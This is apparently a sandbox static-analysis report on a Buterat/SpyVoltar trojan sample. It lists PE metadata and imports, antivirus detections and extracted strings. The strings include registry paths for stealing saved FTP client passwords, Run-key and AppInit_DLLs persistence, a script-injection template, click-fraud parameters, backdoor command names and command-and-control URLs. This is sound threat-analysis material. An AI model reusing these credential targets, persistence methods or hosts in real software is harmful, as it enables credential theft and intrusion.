Static Analysis

PE Compile Time

2012-12-02 15:40:16

PE Imphash

1db674aa41c8b017c09ab688b75ba41b

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x0000cc68 0x0000ce00 6.63491307637
.rdata 0x0000e000 0x0000210a 0x00002200 4.42315500058
.data 0x00011000 0x0001793c 0x00000200 3.61727362724

Imports

Library WININET.dll:
0x40e178 HttpSendRequestW
0x40e17c InternetConnectW
0x40e180 HttpOpenRequestW
0x40e188 InternetCloseHandle
0x40e190 InternetOpenW
0x40e194 InternetReadFile
0x40e19c InternetOpenUrlW
0x40e1a4 InternetSetOptionW
Library SHLWAPI.dll:
0x40e124 StrStrIW
0x40e128 PathMatchSpecW
0x40e12c PathCombineW
0x40e130 wvnsprintfW
0x40e134 StrStrIA
0x40e138 PathRemoveFileSpecW
Library KERNEL32.dll:
0x40e01c TerminateProcess
0x40e020 GetCurrentProcess
0x40e028 IsDebuggerPresent
0x40e02c GetVersionExA
0x40e030 GetFileSize
0x40e034 RtlUnwind
0x40e038 WideCharToMultiByte
0x40e03c MultiByteToWideChar
0x40e040 HeapCreate
0x40e044 CopyFileW
0x40e048 CreateThread
0x40e050 DeleteFileW
0x40e054 CreateProcessW
0x40e05c GetLastError
0x40e060 ExitProcess
0x40e064 LoadLibraryW
0x40e068 GetProcAddress
0x40e06c Sleep
0x40e070 VirtualProtect
0x40e080 SetFilePointer
0x40e084 SetEndOfFile
0x40e088 HeapAlloc
0x40e08c GetVersionExW
0x40e090 SetWaitableTimer
0x40e09c HeapFree
0x40e0a0 ReadFile
0x40e0a4 FindNextFileW
0x40e0a8 GetModuleFileNameW
0x40e0ac WaitForSingleObject
0x40e0b4 GetFileTime
0x40e0b8 CreateFileW
0x40e0bc GetTickCount
0x40e0c0 CloseHandle
0x40e0c4 GetFileSizeEx
0x40e0c8 VirtualFree
0x40e0cc GetProcessHeap
0x40e0d4 VirtualAlloc
0x40e0d8 HeapReAlloc
0x40e0dc GetSystemTime
0x40e0e0 VirtualQuery
0x40e0e4 FindClose
0x40e0e8 WriteFile
0x40e0ec GetLocalTime
0x40e0f0 FindFirstFileW
0x40e0f4 GetModuleHandleW
0x40e0f8 OpenMutexW
0x40e0fc GetCommandLineW
0x40e100 CreateMutexW
Library USER32.dll:
0x40e140 GetWindowLongW
0x40e144 DispatchMessageW
0x40e148 GetForegroundWindow
0x40e14c CharLowerW
0x40e150 CreateWindowExW
0x40e154 FindWindowW
0x40e158 PeekMessageW
0x40e15c SetForegroundWindow
0x40e160 GetSystemMetrics
0x40e164 MessageBoxW
0x40e168 SetWindowPos
0x40e16c SetWindowLongW
0x40e170 SetParent
Library ADVAPI32.dll:
0x40e000 RegCloseKey
0x40e004 RegOpenKeyExW
0x40e008 RegQueryValueExW
0x40e00c RegSetValueExW
0x40e010 RegCreateKeyExW
0x40e014 RegEnumKeyExW
Library SHELL32.dll:
0x40e11c SHGetFolderPathW
Library ole32.dll:
0x40e1ac CoCreateInstance
0x40e1b0 OleInitialize
0x40e1b4 CoInitialize
Library OLEAUT32.dll:
0x40e108 SysAllocString
0x40e10c VariantInit
0x40e110 SysFreeString
0x40e114 VariantClear
!This program cannot be run in DOS mode.
`.rdata
@.data
Vj VVV
QPQQj2
VPVVj8
GVPVVQ
QPQQj6
EpPSj-
EX9E\~
F;5TPA
t|f97tw
D$ ;D$
AAFFHu
QQSVW3
Pj"j^[S
Pj"j^[S
WShh=B
QWShHKA
Qj"j^^V
QVh ?B
QSVhxBB
QVhPAB
Qj"j^^V
QWVhH2A
Pj"j^[S
Pj"j^[S
QWSh`FB
Pj"j^[S
QWShXPA
Pj"j^[S
QWSh(MA
MpQWj^
Pj"j^^V
QVh(PA
QWVhP0B
QVh@=B
PVVj VVV
YYu9!D$
D$,vT2
ttSVj@P
YtFVh
t'h$PA
u%AAFFB;
URPQQhX
;t$,v-
UQPXY]Y[
VC20XC00U
Gu/wIu]JGu
Gu-JGu
4Gu BGu
zGu+IGu"
Gu_CGu
)IusAGuH
Iu~ZGu
TGuPIGu6
GuZFGu
DGu\?Gu
ZGuZDGuBDGu
ZGu5DGu
4GuQQGu#RGuLBGu
AtlAxWinInit
AtlAxAttachControl
AtlAxGetControl
;password=
;user=
;port=
;server=
__scMMdj490)0-Osd
InternetQueryDataAvailable
InternetOpenUrlW
InternetCloseHandle
InternetAttemptConnect
InternetOpenW
InternetReadFile
InternetConnectW
HttpSendRequestW
InternetSetOptionW
HttpOpenRequestW
InternetSetPerSiteCookieDecisionW
InternetClearAllPerSiteCookieDecisions
WININET.dll
StrStrIA
PathRemoveFileSpecW
StrStrIW
PathMatchSpecW
PathCombineW
wvnsprintfW
SHLWAPI.dll
DeleteFileW
CreateProcessW
SetUnhandledExceptionFilter
GetLastError
ExitProcess
LoadLibraryW
GetProcAddress
VirtualProtect
GetPrivateProfileIntW
ExpandEnvironmentStringsW
GetPrivateProfileStringW
SetFilePointer
SetEndOfFile
HeapAlloc
GetVersionExW
SetWaitableTimer
SystemTimeToFileTime
CreateWaitableTimerW
HeapFree
ReadFile
FindNextFileW
GetModuleFileNameW
WaitForSingleObject
GetTimeZoneInformation
GetFileTime
CreateFileW
GetTickCount
CloseHandle
GetFileSizeEx
VirtualFree
GetProcessHeap
GetCurrentDirectoryW
VirtualAlloc
HeapReAlloc
GetSystemTime
GetFileSize
FindClose
WriteFile
GetLocalTime
FindFirstFileW
GetModuleHandleW
OpenMutexW
GetCommandLineW
CreateMutexW
WaitForMultipleObjects
CreateThread
CopyFileW
HeapCreate
MultiByteToWideChar
WideCharToMultiByte
KERNEL32.dll
GetSystemMetrics
MessageBoxW
SetWindowPos
SetWindowLongW
PeekMessageW
GetWindowLongW
DispatchMessageW
GetForegroundWindow
CharLowerW
CreateWindowExW
FindWindowW
SetParent
SetForegroundWindow
USER32.dll
RegEnumKeyExW
RegCloseKey
RegOpenKeyExW
RegQueryValueExW
RegSetValueExW
RegCreateKeyExW
ADVAPI32.dll
SHGetFolderPathW
SHELL32.dll
CoCreateInstance
OleInitialize
CoInitialize
ole32.dll
OLEAUT32.dll
RtlUnwind
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
IsDebuggerPresent
GetVersionExA
VirtualQuery
&ref=%s&real_refer=%s
&real_refer=%s
&condition_id=
&kwtype=
&ref=%s
From: true
^client=
From:
lfolder
SOFTWARE\smartftp\client 2.0\settings\backup
personal favorites
SOFTWARE\smartftp\client 2.0\settings\general\favorites
Password
FavoriteItem
ftp*commander*
ftplist.txt
portnumber
SOFTWARE\martin prikryl\winscp 2\sessions
hostname
SOFTWARE\Far2\Plugins\ftp\hosts
SOFTWARE\Far\Plugins\ftp\hosts
*filezilla*
/*/*/Server
*ghisler*
*total*commander*
*totalcmd*
installdir
ftpininame
SOFTWARE\Ghisler\Total Commander
password
username
default
connections
wcx_ftp.ini
*flashfxp*
datafolder
SOFTWARE\FlashFXP\3
history.dat
quick.dat
sites.dat
yA36zA48dEhfrvghGRg57h5UlDv3
ftp://%S:%S@%S:%u
ftp://%s:%s@%s
ftp://%s:%s@%s:%u
PriorHost
TimeCorr
UniqueNum
http://
AppEvents\Schemes\Apps\Explorer\Navigating\.current
SOFTWARE\Classes\MIME\Database\Content Type\
text/html
application/x-javascript
text/javascript
SOFTWARE\Microsoft\Internet Explorer
JOB FILE
^nocrypt
Page generated at:
setvar
msec1970
b_nav_time
Software\Microsoft\Windows NT\CurrentVersion\Windows
AppInit_DLLs
C:\WINDOWS\system32\gbdwpbm.dll
var scr= document.createElement("script"); scr.src = "%s"; document.getElementsByTagName("head")[0].appendChild(scr);
&host=
track_events
javascript
begun.ru/click.jsp?url=
an.yandex.ru/count
_blank
"domain"
"encrypted"
"condition_id"
"kwtype"
<domain>
</domain>
</url>
<title>
</title>
http://click0
Shell.Explorer
AtlAxWin
eventConn
Shell_TrayWnd
Accept: */*
Referer:
Accept-Language: ru-RU
Accept-Encoding: gzip, deflate
User-Agent:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
%SystemRoot%\System32\%s.exe
%APPDATA%\%s.exe
/updatefile3
\netprotdrvss.exe
job^rev=%s^os=%s
http://ow5dirasuek.com/
http://mkkuei4kdsz.com/
http://gysopui.net/
http://gysopui.net/
begun.ru
confirm^rev=%s^code=%s^param=%s^os=%s
jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
^rcn=1
ZORKASITE
BEGUNFEED
REKLOSOFT
TEASERNET
LUXUPXML
SUPERPOISK
DIRECTST
LIVINETCH
UPDATE
DOWNRUN
CLIENTDEL
PRIORITYHOST
GRABFTPS
RECONNECT
COOKREJCT
DESTROY
Antivirus Signature
Lionic Trojan.Win32.Dacic.4!c
Elastic malicious (high confidence)
ClamAV Win.Malware.Ulise-7170100-0
CMC Clean
CAT-QuickHeal Backdoor.ButeratPMF.S28341189
Skyhigh BehavesLike.Win32.Dropper.kh
ALYac Generic.Dacic.1A7FA519.A.F09F2FBB
Cylance Unsafe
Zillya Trojan.SpyVoltar.Win32.450
Sangfor Suspicious.Win32.Save.a
CrowdStrike win/malicious_confidence_100% (W)
Alibaba Clean
K7GW Trojan ( 005b5adb1 )
K7AntiVirus Trojan ( 005b5adb1 )
huorong Trojan/Vundo.v
Baidu Clean
VirIT Clean
Paloalto generic.ml
Symantec Infostealer.Scapzilla
tehtris Clean
ESET-NOD32 a variant of Win32/SpyVoltar.B
APEX Malicious
Avast Win32:Buterat-WQ [Trj]
Cynet Malicious (score: 100)
Kaspersky UDS:Trojan.Win32.Generic
BitDefender Generic.Dacic.1A7FA519.A.F09F2FBB
NANO-Antivirus Trojan.Win32.Butirat.kylcit
ViRobot Clean
MicroWorld-eScan Generic.Dacic.1A7FA519.A.F09F2FBB
Tencent Trojan.Win32.Spyvoltar.a
Sophos Troj/Buterat-E
F-Secure Heuristic.HEUR/AGEN.1366724
DrWeb BackDoor.Butirat.245
VIPRE Generic.Dacic.1A7FA519.A.F09F2FBB
TrendMicro Clean
McAfeeD Real Protect-LS!FB4A6E7DC2E6
Trapmine suspicious.low.ml.score
CTX exe.unknown.dacic
Emsisoft Generic.Dacic.1A7FA519.A.F09F2FBB (B)
Ikarus Virus.Win32.Vundo
GData Win32.Trojan.PSE.14IDQ4O
Jiangmin Trojan.Generic.hkwfh
Webroot W32.Trojan.Gen
Varist W32/S-b6e4fd03!Eldorado
Avira HEUR/AGEN.1366724
Antiy-AVL Trojan/Win32.SpyVoltar
Kingsoft malware.kb.a.992
Gridinsoft Trojan.Win32.Downloader.oa!s1
Xcitium TrojWare.Win32.Neconyd.A@8a2d6k
Arcabit Generic.Dacic.1A7FA519.A.F09F2FBB
SUPERAntiSpyware Trojan.Agent/Gen-Downloader
ZoneAlarm Troj/Buterat-E
Microsoft Trojan:Win32/ButeRat!pz
Google Detected
AhnLab-V3 Trojan/Win32.Vundo.C223194
Acronis suspicious
VBA32 BScope.Backdoor.Butirat
TACHYON Trojan/W32.Vundo.62976.I
Malwarebytes Generic.Malware.AI.DDS
Panda Trj/Genetic.gen
Zoner Clean
TrendMicro-HouseCall Trojan.Win32.VSX.PE04C9f
Rising Trojan.Clicker!1.BC6E (CLASSIC)
Yandex Trojan.GenAsa!BAn0u5Y1fdo
TrellixENS GenericRXHT-PZ!FB4A6E7DC2E6
SentinelOne Static AI - Malicious PE
MaxSecure Clean
Fortinet W32/SpyVoltar.B!tr
AVG Win32:Buterat-WQ [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan[downloader]:Win/ButeRat.Gen
IRMA Signature
Trend Micro SProtect (Linux) Clean
Avast Core Security (Linux) Win32:Buterat-WQ [Trj]
C4S ClamAV (Linux) Win.Malware.Ulise-7170100-0
Trellix (Linux) GenericRXHT-PZ
Sophos Anti-Virus (Linux) Troj/Buterat-E
Bitdefender Antivirus (Linux) Generic.Dacic.1A7FA519.A.F09F2FBB
G Data Antivirus (Windows) Virus: Generic.Dacic.1A7FA519.A.F09F2FBB (Engine A), Win32.Trojan.PSE.14IDQ4O (Engine B)
WithSecure (Linux) Heuristic.HEUR/AGEN.1366724
ESET Security (Windows) a variant of Win32/SpyVoltar.B trojan
DrWeb Antivirus (Linux) BackDoor.Butirat.245
ClamAV (Linux) Clean
eScan Antivirus (Linux) Generic.Dacic.1A7FA519.A.F09F2FBB(DB)
Kaspersky Standard (Windows) HEUR:Trojan.Win32.Generic
Emsisoft Commandline Scanner (Windows) Generic.Dacic.1A7FA519.A.F09F2FBB (B)
Cuckoo

We're processing your submission... This could take a few seconds.